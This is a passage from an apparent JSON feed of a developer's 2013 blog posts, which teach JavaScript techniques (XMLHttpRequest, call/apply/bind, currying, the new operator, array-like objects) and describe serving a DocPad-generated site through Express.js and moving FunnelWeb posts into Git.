Pretty neat hey, it finds all 143 prime numbers.\nConclusionAnd there we have it, a look at how we can use iterators to create a lazy-evaluated collection API which brings the power of .NET’s LINQ to JavaScript. You’ll find my LINQ in JavaScript repository here and it includes a bunch of tests for the different parts of the API.\nLike I said this is built against a draft implementation of a spec and is in part another experiment but I think it’s a cool example of what’s coming in the future of JavaScript.\n", "id": "2013-09-06-linq-in-javascript-es6" }, { "title": "AJAX without jQuery", "url": "https://www.aaron-powell.com/posts/2013-08-02-ajax-without-jquery/", "date": "Fri, 02 Aug 2013 00:00:00 +0000", "tags": [ "javascript", "ajax", "jquery" ], "description": "When was the last time you wrote an AJAX request?\n\nWhen was the last time you did it without relying on jQuery?\n\nIn this article we'll look at how do do just that, how do make an AJAX request without jQuery to better understand what's going on.", "content": "I’m very much of the opinion that the better you know your tools the better you can make intelligent choices about the layers you put over them. One such layer I see constantly used that people tend to use but not really understand is jQuery. Don’t get me wrong I’m not anti-jQuery or anything, but like I said I believe you should understand your tools before you try and abstract them away.\nSo today I want to look at a really critical part of jQuery, AJAX.\nYou’ve probably written something like this:\n$.ajax({ type: 'get', url: '/foo', success: function (data) { //something with data } }); But what’s that doing under the hood?\nHello XMLHttpRequestIf you’re doing an AJAX request you’re going to need the X part of that and that’s handled through the XMLHttpRequest object. This object is the descendant of the ActiveX object which Microsoft added to early Internet Explorer which kick started the AJAX revolution.\nSo this is the backbone of doing the request and obviously the backbone of what jQuery does under its API, but how do we use it?\nCreating a GET with XMLHttpRequestLet’s look back to our example above, how does that work? Well first things first we need to create an instance of the XMLHttpRequest:\nvar xhr = new XMLHttpRequest(); Now we need to open our request telling it what kind method we want to use and where to go:\nxhr.open('get', '/foo'); Note: There’s a few other arguments which we can pass through, whether you want it to be handled as an async request as well as credentials if you’re doing an authenticated request.\nSince we’ve opened our request we’re probably going to want to do something when it completes right? To do that we rely on the DOM event standard, using the addEventListener method (you can assign event listeners using the on... style but that’s so IE6). Probably the most important event to be listening for is the load event, this is the one that is executed when a successful response is completed:\nxhr.addEventListener('load', function (e) { //handle success }, false); There are other events you can listen for, progress, error and abort which do pretty much what their names state. The progress event is really useful if you’re expecting a request to take a long time to complete, say you’re uploading a file, or expecting a large response, you can listen for this and inform the user of the status, you know, awesome progress bar style.\nBut we’re not done yet, our request is still in a holding pattern, the request hasn’t been issued, that doesn’t happen unless we explicitly make it so, we have to explicitly send the request:\nxhr.send(); You can see it in action here.\nHandling responsesSo you’re probably going to want to do something when the response comes in right? And even more logical is to do something with the response data that comes back. Depending what kind of data you’re getting back you have different ways to work with it. Let’s start with the one you’re most like going to want from an AJAX request, JSON.\nWell the XMLHttpRequest doesn’t really have the concept of JSON, as far as it is concerned this is just text, so we get at it from the responseText property of either the first argument of the event handler or the xhr object itself. With this you would then convert it to a JavaScript object using the JSON API:\nxhr.addEventListener('load', function (e) { var o = JSON.parse(xhr.responseText); //or e.responseText //work with our object }, false); What if you are expecting HTML? Say you’re loading a template or doing another kind of partial page load. For this you’re likely to want the responseXML property. Modern browsers support this, which turns your response content into a DOM snippet you can work with. If you’ve got an older browser there are other options available.\nPOST-ing dataWe’ve seen how to GET data, but what about if we want to POST data?\nObviously we’d need to change the open call:\nxhr.open('POST', '/foo'); But we’re probably going to want to submit some data too right? That’s the whole point of a POST isn’t it? Most likely you’re going to be POST-ing data from a form, and to do that you can use the FormData API. In this scenario you need to pass the FormData instance through the send method:\nvar data = new FormData(); data.append('name', 'Aaron'); xhr.send(data); This will send up request body with name=Aaron in it, where name is the key of a form value and Aaron is the value. This can be read out of the middleware of whatever HTTP framework you’re working with. ASP.Net this would be the HttpRequest.Form object, Express.js it’ll be request.form.\nIf you’re not posting FormData but instead want to POST JSON then you’ll need to do make sure your server knows it’s like that, and doing so means setting the headers appropriately. First off you’ll want to set the Content-Type header:\nxhr.setRequestHeader('Content-Type', 'application/json'); This is especially important if you’re using ASP.Net MVC as your end point, it will detect the Content-Type and be able to parse it into your model. Next you’ll want to make sure that you set the Content-Length so your server knows how much data to expect:\nxhr.setRequestHeader('Content-Length', JSON.stringify(data).length); And finally when you call send you’ll need to send up a JSON string, not the object:\nxhr.send(JSON.stringify(data)); ConclusionSo there we have it, we’ve seen the building blocks of making an AJAX request, the XMLHttpRequest object. We’ve seen how to make GET and POST requests, pass up data, manipulate headers and get data back in a response.\nFrom these building blocks you can start understanding what is actually happening in your libraries and even avoid them if you don’t want the overhead (say a mobile app).\n", "id": "2013-08-02-ajax-without-jquery" }, { "title": "Array-like objects", "url": "https://www.aaron-powell.com/posts/2013-07-22-array-like-objects/", "date": "Mon, 22 Jul 2013 00:00:00 +0000", "tags": [ "javascript" ], "description": "Just because it looks like a duck, walks like a duck, quacks like a duck doesn't mean it's a duck. There's dangers with making assumptions of your JavaScript objects based on their surface area.\n\nThat said, a lot of power can be gleamed by these seemingly innocent assumptions.", "content": "You’ve possibly head the saying\nWhen I see a bird that walks like a duck and swims like a duck and quacks like a duck, I call that bird a duck. - credit\nThis is a common adage when talking about Duck Typing in programming, especially when it comes to working with dynamic languages like JavaScript, based on assumptions made about an object you can attempt to infer other details. Statically typed languages on the other hand make it a bit harder to do Duck Typing, that’s not to say it’s impossible.\nDue to the dynamic nature of JavaScript we actually come across this quite often with arrays in JavaScript. So what makes an object an array? Well there’s two basic building blocks of an array:\nNumerical identifiers A length property So take this code snippet:\nvar foo = ??; for (var i = 0; i < foo.length; i++) { console.log(foo[i]); } From this we can infer that foo is quite possibly an array, it meets our basic requirements to be an array, but like the dangers of duck typing this doesn’t mean that it’s actually an array does it?\nArray-like objectsIt’s quite common in JavaScript to come across array-like objects, objects that on the surface look like arrays but as soon as you look beneath the surface it’ll become apparent that they aren’t actually arrays. You’ve probably come across these objects in the past and not really given it a second thought, two really common objects are the arguments object and a NodeList (you know, from querySelectorAll). Both of these objects have numerical indexers, length, but no push, pop and so on, basically they don’t inherit Array.prototype.\nWith both of these objects the fact that they don’t inherit from Array.prototype is a bit of a pain, it means you couldn’t do something like this for example:\nvar inputs = form.querySelectorAll('input'); var values = inputs.map(function (input) { return { value: input.value, name: input.getAttribute('name') }; }); So this is a pretty simple bit of code, you want to get all the input name/value pairs, maybe to submit them via AJAX but that’s not important, what’s important is we’re using the Array.map method, something very common if you’re doing anything in a modern JavaScript engine (modern being >= IE9).\nMaking arrays of array-like objectsIf you’ve found yourself an array-like object chances are you want to use it like an array, that begs the obvious question, how do we make it an array?\nWell there’s a pretty easy solution to this, we have numerical indexes and a length property, so what about a for loop:\nvar items = []; for (var i = 0, il = inputs.length; i < il; i++) { items.push(inputs[i]); } But… for loop’s are so old school there’s got to be a better way. Well there is and here we can look at exploiting JavaScript’s functions. We’ve seen that you can use call and apply to futz with function scope and this we can do to improve our array-like object manipulation.\nFutzing sliceWhen you’re wanting to create new arrays from existing ones the easiest way is using the slice method. The slice method can be neat if you want to take parts of an array between two indexes, but it can also be used if you want to create a whole clone of the array, like so:\nvar array1 = [1, 2, 3]; var array2 = array1.slice(0); console.log(array1 !== array2); By passing 0 we take a slice starting at index 0 and since we provided no end point it’ll go to the length of the array.\nBut slice is a function just like everything else, you can use call against it.\nAnd where it gets really interesting is when we play with our array-like objects, we can pass that as our context to our slice method:\nvar items = Array.prototype.slice.call(inputs, 0); Yep that’s right, slice doesn’t require an array, just something that looks like an array, as far as slice is concerned it looks like a duck, it quacked, so hey, we’ll treat it like a duck, check out the SpiderMonkey source, it really only cares if there’s a length property, pretty neat!\nConclusionWe’ve seen some building blocks over the last few weeks, things we can use to manipulate functions and objects in the interesting ways and this is just another common usage of the patterns.\nA small piece of advice, if you’re doing a lot of these calls you can assign slice into a variable which you can use, which will make the minification work a whole lot better:\nvar slice = Array.prototype.slice; var items = slice.call(inputs, 0); ", "id": "2013-07-22-array-like-objects" }, { "title": "The JavaScript new operator", "url": "https://www.aaron-powell.com/posts/2013-07-14-javascript-new-operator/", "date": "Sun, 14 Jul 2013 00:00:00 +0000", "tags": [ "javascript" ], "description": "Time to revisit something that was overlooked in the last post, the `new` operator in JavaScript and what it does.", "content": "In the last post I was changing some C# code to JavaScript but there was one part that I just dropped and didn’t explain why, and that was the use of the new operator.\nWhile JavaScript isn’t a classical language, it’s prototypal, and doesn’t have a notion of classes (yet), but it does have a new operator. What’s interesting is it’s an operator like C# (see 14.5.10 of the spec, yep I looked it up :P), and operators tend to do something unique which is also the case with JavaScript new. If you’re a spec-nut you can read what happens in the link above (and also the [[Construct]] method which is important), but if you’re not it does a few things that are of note:\nIt expects a function as the thing being new’ed up The result is a new object that has the prototype of the function that was new’ed, but also potentially their own values (such as values provided as the arguments) So let’s make a simple “class” which consists of a constructor function:\nvar Person = function (firstName, lastName) { this.firstName = firstName; this.lastName = lastName; }; We can then add members to all instances by modifying the prototype:\nPerson.prototype.fullName = function () { return this.firstName + " " + this.lastName; } Now if we run the following we’ll get two different people:\nvar aaron = new Person('Aaron', 'Powell'); var john = new Person('John', 'Smith'); console.assert(aaron == john); //fails The two people we’ve created are different objects, which is exactly what we expect, but if we did:\nconsole.assert(aaron.fullName == john.fullName); The assert won’t fail since they are the same method reference, but on two different objects.\nAnother important part of the Person constructor has a this scope (which we’ve learnt to manipulate in the past) and what would we expect it to be? Well functions inherit the scope of their parent (unless you modify it) which means that our parent scope of Person will be the global object (window in the browser) or null in ES5 Strict Mode.\nBut that’s not the case when you use the new operator, the new operator is yet another way we can modify this, under this scenario it becomes a completely new object literal, it’s similar to doing this:\nPerson = function () { var obj = {}; var Person = function (firstName, lastName) { this.firstName = firstName; this.lastName = lastName; }; Person.apply(obj, arguments); return obj; }; Well that’s close, it doesn’t maintain the prototype chain or setup the constructor properly, what it does do is create a new object that is then returned, meaning each invocation of Person will result in a different object, much like the new operator.\nIs it new or not? The problem with the new operator is that it’s applied to a function, it can be applied to any function, but it can also be omitted. This means you can create yourself a function that’s intended to be a constructor but not used with a new operator, and doing this would mean that you’re augmenting a this scope you probably shouldn’t be, such as the global object.\nSo how do we know if someone used the new operator? You’re probably not writing your own pre-parser to check the code before it’s executed so it’s not like you know the omitted it at a code level. Well there’s an alternative check the constructor.\nOne thing I omitted from the above pseudo-new implementation is setting up the obj.constructor property, this is something that the new operator does, and it’s the easiest way to check if a function was invoked with a new operator:\nvar Person = function (firstName, lastName) { if (this.constructor !== Person) { return new Person(firstName, lastName); } //setup properties } Here we’re checking the constructor against the type we expect the constructor to be. If the function wasn’t invoked with the new operator it won’t receive the right constructor type which means we can assume that function was invoked normally and expects a return, a return which can then be a new instance.\nThis can be a very useful trick if you’re exposing something that’s to be constructible but you don’t trust your consumers to do the right thing.\nWrap up The new operator is an interesting one, it’s a great way to create objects that have unique instances but still share a common root (being the prototype). There’s arguments all over the internet about whether you should use the new operator or not, whether your API should not require the new operator, whether not using new means a violation of the API or whether your API should just be smart enough to deal with both usages.\nBut why would you use it? Well that’s a story for another day ;).\n", "id": "2013-07-14-javascript-new-operator" }, { "title": "Implementing \"indexers\" in JavaScript", "url": "https://www.aaron-powell.com/posts/2013-07-10-implementing-indexers-in-javascript/", "date": "Wed, 10 Jul 2013 00:00:00 +0000", "tags": [ "javascript" ], "description": "My colleague Luke Drumm challenged me to implement C# style indexers in JavaScript.\n\nSo let's have a look at how you can do that, and how you can make some very interesting JavaScript objects that are self replicating. We'll build on the knowledge of using `bind` and `apply` from the last two posts.", "content": "Luke was wanting to know how to implement this C# code as JavaScript:\nclass Foo { public string Stuff { get; set; } public Foo() { } public Foo(string stuff) { this.Stuff = stuff; } public Foo this[string stuff] { get { return new Foo(stuff); } } public Foo Bar() { Console.WriteLine("Darn tootin'"); return this; } } Class-implementation aside the interesting part that he was having trouble with was the indexer, basically being able to write this:\nConsole.WriteLine(new Foo()["one"]["two"]["three"].Bar()); Now what exactly Luke is trying to do I don’t know (and my life is probably safer not knowing) but there’s no point shying away from a problem.\nSo the syntax above is supported by JavaScript, you can use [] notation on an object but it’s different to C#’s implementation. Since JavaScript objects are really glorified hash bags when you use [“one”] it’s saying you want the property one of the object, like when you do it on a C# dictionary type, and this will be fine assuming you have a one property. The problem here is that we don’t have said property, we’re wanting to intercept them and create them on the fly.\nSimulating indexers with functions Some languages support this concept of ‘method missing’ but not JavaScript (well not until we get ES6 proxies) so we need to look at another idea… functions. So we could design something that allows us to write this:\nnew Foo().make("one").make("two").make("three").Bar(); But that’s kind of verbose isn’t it? We’ve got this extra make method that we have to call, we’re still using a new operator, really there’s got to be some nicer way which we could do this… right?\nFunctions that return functions containing functions Let’s make it so we can drop the make part of the above API, so we are now doing this:\nnew Foo()("one")("two")("three").Bar(); That looks somewhat better doesn’t it? Sure we’re using () not [], but that’s minor semantics really, the question is can we actually make that our API? Of course we can, and we’ll have a look at how (if you guessed that you couldn’t where did you think this post would go :P).\nSo you know that JavaScript functions are just objects right? Well they are and what’s cool is that since they are just objects we can manipulate them as such. Let’s start with foo, really foo is just a function (since we don’t have classes in JavaScript):\nvar foo = function () { }; Now, I’m going to want something returned from foo that can be invoked like a function, so maybe I could just return a function…\nvar foo = function () { var innerFoo = function () { }; return innerFoo; }; Ok that’s a good start, I can do:\nfoo()(); Next it’s time to make innerFoo do something, basically what innerFoo should do setup the next level down our chain. To keep the function more readable I’m going to push the logic out into a new function, we’ll call it next:\nvar foo = function () { var innerFoo = function () { return next.apply(this, arguments); }; var next = function (stuff) { }; return innerFoo; }; Do you see where we’re going here? The next method is ultimately going to be smart, setting up the next level down our object, whereas the innerFoo is really just a pass-through to that (it’ll be clearer as we implement our next method):\nvar foo = function () { var innerFoo = function () { return next.apply(this, arguments); }; var next = function (stuff) { var child = foo(); child.stuff = stuff; return child; }; return innerFoo; }; So our next method will:\nCreate a new foo function (well, a new innerFoo) Create a property on the function object called stuff Return the newly created object This means that we can do this:\nconsole.log(foo()('one').stuff); // one Or go further:\nconsole.log(foo()('one')('two').stuff); // two Awesome, we’ve pretty much got indexers going, now let’s add the bar method from our original API.\nvar bar = function () { console.log('Darn tootin\\''); return this; } innerFoo.bar = bar; Remember how I mentioned that functions as objects? Well this is where it can be really useful, since it’s an object we can modify it like any JavaScript object and just add methods and properties like we’ve done, and awesomely since we’re going back through our original foo method it’ll work with all the children we get.\nParent access Once I did the initial revision for Luke he wasn’t satisfied, next up he wanted to know how to access the parent of each instance created. Well that’s actually pretty easy, just a small modification to our innerFoo function:\nvar innerFoo = function () { return next.apply(innerFoo, arguments); }; So this time when it invokes the next level down will have a this context which is the parent object, then you can decide how to expose that as you step down.\nBonus round – displaying the object If you’ve run the code and tried to do a console.log/console.dir of the foo instances returned you’ll see they are well… crappy:\nfunction () { return next.apply(innerFoo, arguments); }; Well that’s kinda crappy, can’t exactly see what the value of stuff is, or what an object’s parent is now can we? Guess we better fix that!\nDid you know that Object has a toString method on it? This method is generally overlooked, if you’re working with an object you’ll likely get [object Object] when you invoke it from your object, functions will return the text content of the function (which can be useful if you want to modify functions on the fly, but that’s a subject for another day :P), and this is why we get the above output from foo, foo is a function after all.\nWell we can write our own toString method if we want, we just put it on our object and it’ll be used rather than the one inherited from the prototype chain. So let’s do this:\nvar toString = function () { return this.stuff; }; innerFoo.toString = toString; Awesome, done! One thing to keep in mind is that toString must return a string value, it can do whatever you want to get there, just return a string ;).\nBut let’s go one step further and exploit this, let’s get it to output the whole parent graph, I’m going to do this by using bind, like we saw in my last post:\nvar next = function (stuff) { var child = foo(); child.stuff = stuff; child.toString = toString.bind(child, this); return child; }; o.toString = toString.bind(o, null); You’ll also see that I’ve bound the parent as the first argument of toString. toString doesn’t take arguments but by using bind we can do that, now let’s update our toString method to handle it:\nvar toString = function (parent) { return parent + ', ' + this.stuff; }; Nifty huh? We’re exploiting the type coercion in JavaScript, because parent isn’t a string, it’s an object, but we’re using the + operator against another string JavaScript will coerce the object to a string, using its toString method, which in turn invokes the function we wrote, which in turn does coercion and so on!\nDone! And with that we wrap up this week’s adventure, if you’ve made it this far well done it was a long one but damn it was fun!\n", "id": "2013-07-10-implementing-indexers-in-javascript" }, { "title": "JavaScript bind, currying and arrow functions", "url": "https://www.aaron-powell.com/posts/2013-07-05-javascript-binding-currying-and-arrows/", "date": "Fri, 05 Jul 2013 00:00:00 +0000", "tags": [ "javascript" ], "description": "After confusing my colleagues with how to invoke functions with a modifided set of arguments at a single time the next evolutionary point was to confuse them with creating functions that are always called with a different state.", "content": "How many times have you written code like this:\nvar foo = { makeRequest: function () { $.get('/foo', function (result) { this.update(result); }); ); }, update: function (data) { /* ... */ } }; //somewhere later in the code foo.makeRequest(); Only to have it poo itself saying that this.update is not a function? Maybe it was with an event handler not an AJAX request, all in all it’s the same problem, you tried to use something and JavaScript changed the value of this on you.\nWelcome to the wonderful world of JavaScript scoping.\nSo there’s a bunch of ways which you can solve this, you can write the var that = this; style code being a very popular one, basically leveraging closure scopes to keep an instance of the type in memory until the function itself is GC’ed.\nBut there’s another approach, Function.bind.\nWe’ll start with our simple demo:\nvar foo = function (x) { console.log(this, x, arguments); }; As we remember from last time we can get this:\nfoo(42); //console.log(window, 42, [42]); Now saw we can the foo function to have a known value of what this is when it’s called, no matter how it’s invoked, even if someone was to sneaky and use call or apply? Well that’s what we can use the bind method for:\nvar bar = foo.bind({ a: 'b' }); bar(42); //console.log({ a: 'b' }, 42, [42]); bar.call('abc', 42); So both times we call the bar function we have the same result, even though we’re trying to specify a this context using the call method.\nOther uses for bind While bind is most commonly used to force a function to always have a specific value for the this object it can also be used for another purpose, to bind specific arguments. If we revisit our foo method we could do this:\nvar baz = foo.bind('a', 'b'); baz(); //console.log('a', 'b', ['b']); Practical application of argument binding When you’re looking for a practical application for argument binding an idea that comes to mind is Currying. I’m not going to dive too deeply into what currying is, if you’re not familiar with the concept start with the Wikipedia link and expand from there (also functional programming isn’t my area of expertise, I just understand some of the basics and may be missing the point from here on out, if so Twitter is –> for you to rant on).\nLet’s create a new function to add two numbers:\nvar sum = function (x, y) { return x + y; }; Ideally we want to be able to do something like this:\nvar add2 = curry(sum, 2); add2(4); // 6 Now we’ll create a curry function:\nvar curry = function (fn) { var args = Array.prototype.slice.call(arguments, 1); return fn.bind.apply(fn, [this].concat(args); }; While this function is kind of trippy looking it’s more because it’s a very generic method, it’s allowing us to curry a function and bind any number of arguments in place (which is why we’re using the apply method of bind to provide an array of arguments) and the arguments we provide when calling the bound function will be appended on to the ones which we pre-bound.\nBut from this we end up with a new function that we can call as above.\nBonus: My colleague Liam Mclennan flicked me this gist of how to do an even cooler currying approach.\nFat arrows If you’ve done anything with CoffeeScript or TypeScript you might be familiar with the concept of fat arrow functions. These languages use a modified syntax to deal with lexical scoping problem that bind can be used to solve. TypeScript tracks your usage of this in fat arrow functions and replaces it with a captured variable, CoffeeScript relies on the @ symbol to do a similar thing.\nFor anyone who’s not been following the evolution of ECMAScript 6 (the next version of JavaScript) one of the accepted new syntax features is arrow function syntax.\nSimply put the language is going to have a way to defining a function which you can be confident of what the this value will be (sure you can still futz with it if you want to but it’s covering the most common scenarios).\nTo test out the new arrow function syntax grab Firefox v22 or newer.\n", "id": "2013-07-05-javascript-binding-currying-and-arrows" }, { "title": "JavaScript call and apply", "url": "https://www.aaron-powell.com/posts/2013-07-04-javascript-call-and-apply/", "date": "Thu, 04 Jul 2013 00:00:00 +0000", "tags": [ "javascript" ], "description": "After having confused one of my colleagues with some code that used the JavaScript `apply` method and giving them an answer that didn't leave them completely bemused I thought I'd share my explanation with the world.", "content": "A colleague recently came across this line in our codebase that I wrote:\nbinding.vehicle.involvements.push.apply(binding.vehicle.involvements, vehicle.involvements); What the overall result of the code is isn’t particularly important, the part that tripped them up (and made them think I’m on drugs I’m not actually on) was this:\nbinding.vehicle.involvements.push.apply(binding.vehicle.involvements, vehicle.involvements); Now the involvements property is an array in both scenarios which exposes a push method, the confusion was around what the apply method does and why I was even using it.\nBoth call and apply are methods which are part of the JavaScript language and are exposed on the Function prototype, meaning that they can be accessed from any function, so let’s say we have this function:\nfunction foo (a) { console.log(this, a, argument); }; And we invoke it like this:\nfoo('b'); It is the same as doing this:\nconsole.log(window, 'b', ['b']); Note: In ES3 it’ll be window, ES5 strict mode it’ll be null, or undefined, I forget which\nNow let’s throw the apply method into the mix and invoke it like so:\nfoo.apply('a', ['b']); This time it’ll be like we’ve done this:\nconsole.log('a', 'b', ['b']); We could alternatively provide an array of arguments so:\nfoo.apply('a', ['b','c']); Becomes:\nconsole.log('a', 'b', ['b', 'c']); So what happened?\nThe apply method takes two arguments, the first is what controls the this value, the second is an array of objects that will be decomposed to represent the various arguments passed in, meaning that the array item 0 will be the first argument, b in our example, and so on.\nThe call method is similar but instead of taking an array that represents the arguments it takes a splat, anything after the this context will be used directly as the arguments. So we’d use call like this to achieve the same result:\nfoo.call('a', 'b', 'c'); Relating it to our original code Let’s think about how this related back to our original code, working with arrays and push. Say I have an array and I want to add N number of values to said array. How would you do it?\nvar arr = [1,2,3]; var arr2 = [4,5,6]; //I want arr == [1,2,3,4,5,6] Well the first obvious candidate is a for loop:\nfor (var i = 0; i < arr2.length; i++) { arr.push(arr2[i]); } That’ll do exactly what we’re after, but there’s a problem, we’re calling push a lot, once for every item in the array in fact(!!). This can be a bit of a performance hit, especially if you have large arrays, the JavaScript runtime engine simply can’t optimise it because it doesn’t know how many there could be so it can’t preallocate the memory, meaning it’s somewhat inefficient.\nAlternatively you could use the concat method:\narr = arr.concat(arr2); That works just fine but the problem is that you replace arr with a new instance of it. Generally speaking that’s not a problem, but if you’re relying on the object itself to not change, at a memory level (say it’s an observable property from Knockout, or a bound property in WinJS), you’ll potentially run into problems.\nSo we’re back to push, we want to append multiple items to an existing array without overriding the original object/property. The nice thing about push is that we can provide it N number of arguments which represent all the items we wish to push. Well since I’ve got an array I can’t exactly pass that in directly, since then argument 1 will be the array, it won’t be decomposed. And this is where apply comes in, we can provide the array as the 2nd argument to apply and have N number of items pushed to the array. This brings us to doing this:\narr.push.apply(arr, arr2); And there we have it, we’ve used apply to decompose an array and push all he values into the target array, basically we’ve done this:\narr.push(4,5,6); Since the this context we’ve set is the arr object itself.\nHopefully that does a good enough explanation to confuse everyone ;).\n", "id": "2013-07-04-javascript-call-and-apply" }, { "title": "DDDMelbourne workshop", "url": "https://www.aaron-powell.com/posts/2013-06-26-dddmelbourne-workshop/", "date": "Wed, 26 Jun 2013 00:00:00 +0000", "tags": [ "dddmelbourne" ], "description": "I'm going to be presenting a JavaScript workshop at the upcoming DDDMelbourne conference", "content": "It’s that time of year again, it’s conference time!. I’m excited to announce that I’ll be coming down for my 4th(!!) DDDMelbourne and the overall agenda looks quite exciting!\nThis year the organisers have decided to add a workshop track as well as the three presentations, and when they asked me if I’d do a JavaScript workshop I jumped at the chance.\nThe workshop is going to be on an aspect of JavaScript that I’m quite passionate about and we’ll be getting really hands-on and mostly just writing code for the hour, so bring your device and get ready to code.\nSo register now before it’s too late (ticket’s are going quick).\n", "id": "2013-06-26-dddmelbourne-workshop" }, { "title": "Walking a JavaScript object", "url": "https://www.aaron-powell.com/posts/2013-06-21-walking-a-javascript-object/", "date": "Fri, 21 Jun 2013 00:00:00 +0000", "tags": [ "javascript" ], "description": "Ever had a path to a path to a property on a JavaScript object that you want to walk? Something along the lines of `foo.bar.baz`.\n\nRecently I was trying to solve this problem and came across a nifty little trick", "content": "Recently I was trying to solve a problem where I had a JSON path to a property on an object, the path was going to be n layers deep and the object itself was also n layers deep. I needed to solve this problem in a fairly generic manner, as there was a number of different scenarios under which this could would be run.\nBasically I had this:\nvar path = 'foo.bar.baz'; And an object like this:\nvar obj = { foo: { bar: { baz: 42 } } }; So from the path I want to be able to find out the value in the object that matches it.\nPass #1A colleague of mine gave me the code which would do this, from an application they had, implemented using a for loop:\nvar value = obj; var paths = path.split('.'); for (var i = 0; i < paths.length; i++) { value = value[paths[i]]; } console.log(value); Well that does exactly what needs to be done, exactly as advertised. Job done right?\nPass #2The for loop is so old school, these days it’s all functional programming that the kids are into these days so I looked at our method and decided there had to be another way which we could approach this, something a bit more functional.\nSince what we’re doing it walking through an object I wondered “Could I use something from the map/reduce/filter family for that?”. Well it turns out that yes there is something ideal for that, reduce.\nYou see the reduce method takes a callback like this:\nfunction (prev, current) { //return what is to be the next 'prev' value } So as long as the prev is an instance of obj then we can walk it, and doing that is fine as we can provide an argument to the reduce method that defines what the initial value will be. This means we can rewrite our walker like so:\nvar value = path.split('.').reduce(function (prev, curr) { return prev[curr]; }, obj); And there we have it, a nice little object walker.\n", "id": "2013-06-21-walking-a-javascript-object" }, { "title": "Solving DocPad's excessive memory usage", "url": "https://www.aaron-powell.com/posts/2013-06-18-solving-docpads-excessive-memory-usage/", "date": "Tue, 18 Jun 2013 00:00:00 +0000", "tags": [ "docpad" ], "description": "After moving my site to DocPad I found a problem, DocPad is a massive memory hog! The result of this is that I can't even run it on a single Heroku web dyno, a static HTML site can't run on a single web dyno!\n\nSo let's have a look at how I went and solved the problem", "content": "Since I decide to move my site from FunnelWeb to DocPad I also decided to deploy to Heroku since I like them as a host. So I built my site, got everything into Git and then I did a git push heroku master.\nAnd then it fell over.\nAs soon as the push completed Heroku kicked off and started to spin up the dyno, but when I hit the site it said it’d crashed.\nCrashed, seriously? It’s a bunch of HTML files, how on earth can that crash?\nSo I crack out the Heroku toolbox and inspect the log files and find the crash, it crashed because it exceeded the allocated memory.\nExceeded the allocated memory?! IT’S A STATIC SITE!\nOk, fine, let’s have a look at what could be wrong, how a static site could be blowing out the memory allowance (512mb it’s allocated). I fire up the docpad run command which is what is done on Heroku and this is what I get:\nThat’s nearly 700mb memory usage for a static site! I’ve seen it peak at over 900mb, run idle around 850mb, all kinds of wacky memory usage.\nThe not so static static siteSo it would seem that I made a false assumption about DocPad, it’s not quite as static as I thought it was. While yes, it generates all these flat HTML files on disk it also keeps all the content in memory:\n@slace @shiftkey we put all the files in memory for generation and keep them there for quick access, so not a bad thing\n— DocPad (@DocPad) June 2, 2013 Well that’s kind of crap, I mean, I’ve got ~400 files in my generated output so it’s a lot of files that need to be stored in memory when really the requests can just be routed to a location on disk.\nSolving the memory problemI’ve already made my choice to go with DocPad but since it’s having some whacky memory consumption issues meaning that it’s not really going to be a viable deployment option so how can I go about it?\nWell why not use DocPad to generate the HTML and then just write my own routing layer using Express.js? After all DocPad is just sitting on top of Express.js to do a lot of its heavy lifting. In fact it’s really simple to make a routing engine on top of Express.js:\nvar express = require('express'); var app = express(); app.use(express.static(__dirname + '/out')); app.listen(process.env.PORT || 3000); Yep that’s it, we’ve got our site going and now I can deploy it.\nNote: There’s still a bit of a limitation here, DocPad’s memory will blow out mostly during its generation phase so this now means that I have to check the /out folder into my git repository, which makes it larger, but it’s not that big a problem really.\nMaintaining old routes As I said in my last post I needed to ensure that I didn’t break my SEO between my old routes and my new ones. When using DocPad’s engine it’ll look at the urls meta-data which it’ll then 301 the response. Now you can see why DocPad does have some of its heavy memory usage, it actually does some on-the-fly mapping of routes. Still, I’m pretty sure I can do this without the memory explosion.\nMy idea is that we can use the DocPad plugin model and from that generate a JSON object that represents all the alternate routes for our posts, then we can load that JSON into our Express.js app and map the routes.\nMy plugin can be found here and what it does is:\nHook into the writeAfter event Grab all document objects Create an object that contains the URL we want and all the alternate URLs that we want to 301 Strip out any that don’t have alternate URLs Write this to the output folder Here’s the code that’ll create our route map:\nvar docs = this.docpad.getCollection('documents').toJSON(); var routes = docs.map(function (doc) { return { url: doc.url, redirects: doc.urls.filter(function (x) { return x !== doc.url; }) }; }).filter(function (route) { return !!route.redirects.length; }); So from that we can now update our Express.js file to look like so:\nvar express = require('express'); var app = express(); app.get('/routes.json', function (req, res) { res.status(403).send('403 Forbidden'); }) app.use(express.static(__dirname + '/out')); app.use('/get', express.static(__dirname + '/src/files/get')); var routes = require('./out/routes.json').routes; var redirector = function (dest) { return function (req, res) { res.redirect(301, dest); }; }; routes.map(function (route) { if (route.redirects) { return route.redirects.map(function (redirect) { return app.get(redirect, redirector(route.url)); }); } return; }); app.listen(process.env.PORT || 3000); I’ve also put a few other special routes, I’m putting a 403 on the routes.json file since it sits in the root of my out folder and I don’t really want it served out to the world (I’m also serving my assets from a special folder to avoid duplicating them in the repo and making it huge).\nConclusionDocPad appears to be a bit of a memory hog which can introduce some problems when you are looking at your hosting options, so make sure you look at that before signing any hosting agreement.\nBut that said if you want to invest a little bit of effort and not rely on DocPad as your routing engine then you can rely on just the HTML that is generated and use a middleware like Express.js to handle the routing with a minimal memory footprint.\nFor the record, my site now run around the 20mb memory footprint.\n", "id": "2013-06-18-solving-docpads-excessive-memory-usage" }, { "title": "From FunnelWeb to Git in a few simple steps", "url": "https://www.aaron-powell.com/posts/2013-06-11-funnelweb-to-git/", "date": "Mon, 10 Jun 2013 00:00:00 +0000", "tags": [ "funnelweb", "scriptcs", "git" ], "description": "With the decision to go to Git from FunnelWeb I wanted to be able to maintain the history of the changes. Since many of my posts have multiple revisions I wanted them to be listed as changesets in Git.\n\nIn this post we'll look at how to get the content out of FunnelWeb (or any content database) and into Git as full history.", "content": "Prelude: I’m going to assume you’ve got the database somewhere locally that you can work with, I wouldn’t recommend doing it against a production database. We’re not doing anything destructive against it but better safe than sorry!.\nThe scenario is that I’m wanting to be able to visualise the revision history of my posts in FunnelWeb as Git commits, each new revision of a post should be a new commit. The history order should match the date that posts were created (or edited) so that it doesn’t look like just a dump into Git, it looks like actual history.\nWithout doing a full Git primer there’s one really important aspect of Git that you need to be aware of. Git is basically a small linux file system so with file system theory under our belt we should know that there’s a date associated with files (or in this case, commits). So at least in theory we should be able to control when a commit happened right? After all I’ve got posts from 2010 and I’d like those commits to reflect that.\nSo armed with a bit of knowledge and Brendan Forster’s skype handle I started digging.\nIt’s a dateSince my work on the time machine is running behind schedule (snap!) it’s time to get an understanding of date’s in Git. Each commit in Git will have two dates associated with it, author date and committer date, 